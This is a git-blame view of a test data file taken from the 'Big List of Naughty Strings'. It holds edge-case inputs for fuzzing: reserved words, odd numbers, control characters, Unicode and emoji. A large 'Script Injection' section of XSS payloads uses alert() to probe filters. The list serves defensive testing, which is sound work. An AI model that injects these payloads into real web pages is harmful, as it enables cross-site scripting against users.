Ed Tanous | f927347 | 2017-02-28 16:05:13 -0800 | [diff] [blame] | 1 | # sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt |
| 2 | |
| 3 | # Reserved Strings |
| 4 | # |
| 5 | # Strings which may be used elsewhere in code |
| 6 | |
| 7 | undefined |
| 8 | undef |
| 9 | null |
| 10 | NULL |
| 11 | (null) |
| 12 | nil |
| 13 | NIL |
| 14 | true |
| 15 | false |
| 16 | True |
| 17 | False |
| 18 | TRUE |
| 19 | FALSE |
| 20 | None |
| 21 | hasOwnProperty |
| 22 | \ |
| 23 | \\ |
| 24 | |
| 25 | # Numeric Strings |
| 26 | # |
| 27 | # Strings which can be interpreted as numeric |
| 28 | |
| 29 | 0 |
| 30 | 1 |
| 31 | 1.00 |
| 32 | $1.00 |
| 33 | 1/2 |
| 34 | 1E2 |
| 35 | 1E02 |
| 36 | 1E+02 |
| 37 | -1 |
| 38 | -1.00 |
| 39 | -$1.00 |
| 40 | -1/2 |
| 41 | -1E2 |
| 42 | -1E02 |
| 43 | -1E+02 |
| 44 | 1/0 |
| 45 | 0/0 |
| 46 | -2147483648/-1 |
| 47 | -9223372036854775808/-1 |
| 48 | -0 |
| 49 | -0.0 |
| 50 | +0 |
| 51 | +0.0 |
| 52 | 0.00 |
| 53 | 0..0 |
| 54 | . |
| 55 | 0.0.0 |
| 56 | 0,00 |
| 57 | 0,,0 |
| 58 | , |
| 59 | 0,0,0 |
| 60 | 0.0/0 |
| 61 | 1.0/0.0 |
| 62 | 0.0/0.0 |
| 63 | 1,0/0,0 |
| 64 | 0,0/0,0 |
| 65 | --1 |
| 66 | - |
| 67 | -. |
| 68 | -, |
| 69 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 |
| 70 | NaN |
| 71 | Infinity |
| 72 | -Infinity |
| 73 | INF |
| 74 | 1#INF |
| 75 | -1#IND |
| 76 | 1#QNAN |
| 77 | 1#SNAN |
| 78 | 1#IND |
| 79 | 0x0 |
| 80 | 0xffffffff |
| 81 | 0xffffffffffffffff |
| 82 | 0xabad1dea |
| 83 | 123456789012345678901234567890123456789 |
| 84 | 1,000.00 |
| 85 | 1 000.00 |
| 86 | 1'000.00 |
| 87 | 1,000,000.00 |
| 88 | 1 000 000.00 |
| 89 | 1'000'000.00 |
| 90 | 1.000,00 |
| 91 | 1 000,00 |
| 92 | 1'000,00 |
| 93 | 1.000.000,00 |
| 94 | 1 000 000,00 |
| 95 | 1'000'000,00 |
| 96 | 01000 |
| 97 | 08 |
| 98 | 09 |
| 99 | 2.2250738585072011e-308 |
| 100 | |
| 101 | # Special Characters |
| 102 | # |
| 103 | # ASCII punctuation. All of these characters may need to be escaped in some |
| 104 | # contexts. Divided into three groups based on (US-layout) keyboard position. |
| 105 | |
| 106 | ,./;'[]\-= |
| 107 | <>?:"{}|_+ |
| 108 | !@#$%^&*()`~ |
| 109 | |
| 110 | # Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, |
| 111 | # and U+007F (DEL) |
| 112 | # Often forbidden to appear in various text-based file formats (e.g. XML), |
| 113 | # or reused for internal delimiters on the theory that they should never |
| 114 | # appear in input. |
| 115 | # The next line may appear to be blank or mojibake in some viewers. |
| 116 | |
| 117 | |
| 118 | # Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. |
| 119 | # Commonly misinterpreted as additional graphic characters. |
| 120 | # The next line may appear to be blank, mojibake, or dingbats in some viewers. |
| 121 | |
| 122 | |
| 123 | # Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode |
| 124 | # version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), |
| 125 | # and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often |
| 126 | # treated as whitespace in some contexts. |
| 127 | # This file unfortunately cannot express strings containing |
| 128 | # U+0000, U+000A, or U+000D (NUL, LF, CR). |
| 129 | # The next line may appear to be blank or mojibake in some viewers. |
| 130 | # The next line may be flagged for "trailing whitespace" in some viewers. |
| 131 |
|
| 132 | |
| 133 | # Unicode additional control characters: all of the characters with |
| 134 | # general category Cf (in Unicode 8.0.0). |
| 135 | # The next line may appear to be blank or mojibake in some viewers. |
| 136 | |
| 137 | |
| 138 | # "Byte order marks", U+FEFF and U+FFFE, each on its own line. |
| 139 | # The next two lines may appear to be blank or mojibake in some viewers. |
| 140 | |
| 141 | |
| 142 | |
| 143 | # Unicode Symbols |
| 144 | # |
| 145 | # Strings which contain common unicode symbols (e.g. smart quotes) |
| 146 | |
| 147 | Ω≈ç√∫˜µ≤≥÷ |
| 148 | åß∂ƒ©˙∆˚¬…æ |
| 149 | œ∑´®†¥¨ˆøπ“‘ |
| 150 | ¡™£¢∞§¶•ªº–≠ |
| 151 | ¸˛Ç◊ı˜Â¯˘¿ |
| 152 | ÅÍÎÏ˝ÓÔÒÚÆ☃ |
| 153 | Œ„´‰ˇÁ¨ˆØ∏”’ |
| 154 | `⁄€‹›fifl‡°·‚—± |
| 155 | ⅛⅜⅝⅞ |
| 156 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя |
| 157 | ٠١٢٣٤٥٦٧٨٩ |
| 158 | |
| 159 | # Unicode Subscript/Superscript/Accents |
| 160 | # |
| 161 | # Strings which contain unicode subscripts/superscripts; can cause rendering issues |
| 162 | |
| 163 | ⁰⁴⁵ |
| 164 | ₀₁₂ |
| 165 | ⁰⁴⁵₀₁₂ |
| 166 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ |
| 167 | |
| 168 | # Quotation Marks |
| 169 | # |
| 170 | # Strings which contain misplaced quotation marks; can cause encoding errors |
| 171 | |
| 172 | ' |
| 173 | " |
| 174 | '' |
| 175 | "" |
| 176 | '"' |
| 177 | "''''"'" |
| 178 | "'"'"''''" |
| 179 | <foo val=“bar” /> |
| 180 | <foo val=“bar” /> |
| 181 | <foo val=”bar“ /> |
| 182 | <foo val=`bar' /> |
| 183 | |
| 184 | # Two-Byte Characters |
| 185 | # |
| 186 | # Strings which contain two-byte characters: can cause rendering issues or character-length issues |
| 187 | |
| 188 | 田中さんにあげて下さい |
| 189 | パーティーへ行かないか |
| 190 | 和製漢語 |
| 191 | 部落格 |
| 192 | 사회과학원 어학연구소 |
| 193 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 |
| 194 | 社會科學院語學研究所 |
| 195 | 울란바토르 |
| 196 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 |
| 197 | |
| 198 | # Changing length when lowercased |
| 199 | # |
| 200 | # Characters which increase in length (2 to 3 bytes) when lowercased |
| 201 | # Credit: https://twitter.com/jifa/status/625776454479970304 |
| 202 | |
| 203 | Ⱥ |
| 204 | Ⱦ |
| 205 | |
| 206 | # Japanese Emoticons |
| 207 | # |
| 208 | # Strings which consists of Japanese-style emoticons which are popular on the web |
| 209 | |
| 210 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ |
| 211 | (。◕ ∀ ◕。) |
| 212 | `ィ(´∀`∩ |
| 213 | __ロ(,_,*) |
| 214 | ・( ̄∀ ̄)・:*: |
| 215 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ |
| 216 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ |
| 217 | (╯°□°)╯︵ ┻━┻) |
| 218 | (ノಥ益ಥ)ノ ┻━┻ |
| 219 | ┬─┬ノ( º _ ºノ) |
| 220 | ( ͡° ͜ʖ ͡°) |
| 221 | |
| 222 | # Emoji |
| 223 | # |
| 224 | # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always |
| 225 | |
| 226 | 😍 |
| 227 | 👩🏽 |
| 228 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 |
| 229 | 🐵 🙈 🙉 🙊 |
| 230 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 |
| 231 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 |
| 232 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 |
| 233 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 |
| 234 | |
| 235 | # Regional Indicator Symbols |
| 236 | # |
| 237 | # Regional Indicator Symbols can be displayed differently across |
| 238 | # fonts, and have a number of special behaviors |
| 239 | |
| 240 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 |
| 241 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 |
| 242 | 🇺🇸🇷🇺🇸🇦 |
| 243 | |
| 244 | # Unicode Numbers |
| 245 | # |
| 246 | # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric |
| 247 | |
| 248 | 123 |
| 249 | ١٢٣ |
| 250 | |
| 251 | # Right-To-Left Strings |
| 252 | # |
| 253 | # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) |
| 254 | |
| 255 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. |
| 256 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ |
| 257 | הָיְתָהtestالصفحات التّحول |
| 258 | ﷽ |
| 259 | ﷺ |
| 260 | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، |
| 261 | |
| 262 | # Trick Unicode |
| 263 | # |
| 264 | # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) |
| 265 | |
| 266 | test |
| 267 | test |
| 268 |
test
|
| 269 | testtest |
| 270 | test |
| 271 | |
| 272 | # Zalgo Text |
| 273 | # |
| 274 | # Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) |
| 275 | |
| 276 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ |
| 277 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ |
| 278 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ |
| 279 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ |
| 280 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ |
| 281 | |
| 282 | # Unicode Upsidedown |
| 283 | # |
| 284 | # Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) |
| 285 | |
| 286 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ |
| 287 | 00˙Ɩ$- |
| 288 | |
| 289 | # Unicode font |
| 290 | # |
| 291 | # Strings which contain bold/italic/etc. versions of normal characters |
| 292 | |
| 293 | The quick brown fox jumps over the lazy dog |
| 294 | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 |
| 295 | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 |
| 296 | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 |
| 297 | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 |
| 298 | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 |
| 299 | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 |
| 300 | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ |
| 301 | |
| 302 | # Script Injection |
| 303 | # |
| 304 | # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS |
| 305 | |
| 306 | <script>alert(123)</script> |
| 307 | <script>alert('123');</script> |
| 308 | <img src=x onerror=alert(123) /> |
| 309 | <svg><script>123<1>alert(123)</script> |
| 310 | "><script>alert(123)</script> |
| 311 | '><script>alert(123)</script> |
| 312 | ><script>alert(123)</script> |
| 313 | </script><script>alert(123)</script> |
| 314 | < / script >< script >alert(123)< / script > |
| 315 | onfocus=JaVaSCript:alert(123) autofocus |
| 316 | " onfocus=JaVaSCript:alert(123) autofocus |
| 317 | ' onfocus=JaVaSCript:alert(123) autofocus |
| 318 | <script>alert(123)</script> |
| 319 | <sc<script>ript>alert(123)</sc</script>ript> |
| 320 | --><script>alert(123)</script> |
| 321 | ";alert(123);t=" |
| 322 | ';alert(123);t=' |
| 323 | JavaSCript:alert(123) |
| 324 | ;alert(123); |
| 325 | src=JaVaSCript:prompt(132) |
| 326 | "><script>alert(123);</script x=" |
| 327 | '><script>alert(123);</script x=' |
| 328 | ><script>alert(123);</script x= |
| 329 | " autofocus onkeyup="javascript:alert(123) |
| 330 | ' autofocus onkeyup='javascript:alert(123) |
| 331 | <script\x20type="text/javascript">javascript:alert(1);</script> |
| 332 | <script\x3Etype="text/javascript">javascript:alert(1);</script> |
| 333 | <script\x0Dtype="text/javascript">javascript:alert(1);</script> |
| 334 | <script\x09type="text/javascript">javascript:alert(1);</script> |
| 335 | <script\x0Ctype="text/javascript">javascript:alert(1);</script> |
| 336 | <script\x2Ftype="text/javascript">javascript:alert(1);</script> |
| 337 | <script\x0Atype="text/javascript">javascript:alert(1);</script> |
| 338 | '`"><\x3Cscript>javascript:alert(1)</script> |
| 339 | '`"><\x00script>javascript:alert(1)</script> |
| 340 | ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF |
| 341 | ABC<div style="x:expression\x5C(javascript:alert(1)">DEF |
| 342 | ABC<div style="x:expression\x00(javascript:alert(1)">DEF |
| 343 | ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF |
| 344 | ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF |
| 345 | ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF |
| 346 | ABC<div style="x:\x09expression(javascript:alert(1)">DEF |
| 347 | ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF |
| 348 | ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF |
| 349 | ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF |
| 350 | ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF |
| 351 | ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF |
| 352 | ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF |
| 353 | ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF |
| 354 | ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF |
| 355 | ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF |
| 356 | ABC<div style="x:\x20expression(javascript:alert(1)">DEF |
| 357 | ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF |
| 358 | ABC<div style="x:\x00expression(javascript:alert(1)">DEF |
| 359 | ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF |
| 360 | ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF |
| 361 | ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF |
| 362 | ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF |
| 363 | ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF |
| 364 | ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF |
| 365 | ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF |
| 366 | ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF |
| 367 | <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 368 | <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 369 | <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 370 | <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 371 | <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 372 | <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 373 | <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 374 | <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 375 | <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 376 | <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 377 | <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 378 | <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 379 | <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 380 | <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 381 | <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 382 | <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 383 | <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 384 | <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 385 | <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 386 | <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 387 | <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 388 | <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 389 | <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 390 | <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 391 | <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 392 | <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 393 | <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 394 | <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 395 | <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 396 | <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 397 | <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 398 | <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 399 | <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 400 | <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 401 | <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 402 | <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 403 | <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 404 | <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 405 | <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 406 | <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 407 | <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 408 | <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 409 | <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 410 | <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 411 | <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 412 | <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 413 | <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 414 | <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 415 | <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 416 | <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 417 | <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 418 | <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
| 419 | <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> |
| 420 | <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> |
| 421 | <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> |
| 422 | <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> |
| 423 | <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> |
| 424 | `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> |
| 425 | `"'><img src=xxx:x \x22onerror=javascript:alert(1)> |
| 426 | `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> |
| 427 | `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> |
| 428 | `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> |
| 429 | `"'><img src=xxx:x \x09onerror=javascript:alert(1)> |
| 430 | `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> |
| 431 | `"'><img src=xxx:x \x00onerror=javascript:alert(1)> |
| 432 | `"'><img src=xxx:x \x27onerror=javascript:alert(1)> |
| 433 | `"'><img src=xxx:x \x20onerror=javascript:alert(1)> |
| 434 | "`'><script>\x3Bjavascript:alert(1)</script> |
| 435 | "`'><script>\x0Djavascript:alert(1)</script> |
| 436 | "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> |
| 437 | "`'><script>\xE2\x80\x81javascript:alert(1)</script> |
| 438 | "`'><script>\xE2\x80\x84javascript:alert(1)</script> |
| 439 | "`'><script>\xE3\x80\x80javascript:alert(1)</script> |
| 440 | "`'><script>\x09javascript:alert(1)</script> |
| 441 | "`'><script>\xE2\x80\x89javascript:alert(1)</script> |
| 442 | "`'><script>\xE2\x80\x85javascript:alert(1)</script> |
| 443 | "`'><script>\xE2\x80\x88javascript:alert(1)</script> |
| 444 | "`'><script>\x00javascript:alert(1)</script> |
| 445 | "`'><script>\xE2\x80\xA8javascript:alert(1)</script> |
| 446 | "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> |
| 447 | "`'><script>\xE1\x9A\x80javascript:alert(1)</script> |
| 448 | "`'><script>\x0Cjavascript:alert(1)</script> |
| 449 | "`'><script>\x2Bjavascript:alert(1)</script> |
| 450 | "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> |
| 451 | "`'><script>-javascript:alert(1)</script> |
| 452 | "`'><script>\x0Ajavascript:alert(1)</script> |
| 453 | "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> |
| 454 | "`'><script>\x7Ejavascript:alert(1)</script> |
| 455 | "`'><script>\xE2\x80\x87javascript:alert(1)</script> |
| 456 | "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> |
| 457 | "`'><script>\xE2\x80\xA9javascript:alert(1)</script> |
| 458 | "`'><script>\xC2\x85javascript:alert(1)</script> |
| 459 | "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> |
| 460 | "`'><script>\xE2\x80\x83javascript:alert(1)</script> |
| 461 | "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> |
| 462 | "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> |
| 463 | "`'><script>\xE2\x80\x80javascript:alert(1)</script> |
| 464 | "`'><script>\x21javascript:alert(1)</script> |
| 465 | "`'><script>\xE2\x80\x82javascript:alert(1)</script> |
| 466 | "`'><script>\xE2\x80\x86javascript:alert(1)</script> |
| 467 | "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> |
| 468 | "`'><script>\x0Bjavascript:alert(1)</script> |
| 469 | "`'><script>\x20javascript:alert(1)</script> |
| 470 | "`'><script>\xC2\xA0javascript:alert(1)</script> |
| 471 | <img \x00src=x onerror="alert(1)"> |
| 472 | <img \x47src=x onerror="javascript:alert(1)"> |
| 473 | <img \x11src=x onerror="javascript:alert(1)"> |
| 474 | <img \x12src=x onerror="javascript:alert(1)"> |
| 475 | <img\x47src=x onerror="javascript:alert(1)"> |
| 476 | <img\x10src=x onerror="javascript:alert(1)"> |
| 477 | <img\x13src=x onerror="javascript:alert(1)"> |
| 478 | <img\x32src=x onerror="javascript:alert(1)"> |
| 479 | <img\x47src=x onerror="javascript:alert(1)"> |
| 480 | <img\x11src=x onerror="javascript:alert(1)"> |
| 481 | <img \x47src=x onerror="javascript:alert(1)"> |
| 482 | <img \x34src=x onerror="javascript:alert(1)"> |
| 483 | <img \x39src=x onerror="javascript:alert(1)"> |
| 484 | <img \x00src=x onerror="javascript:alert(1)"> |
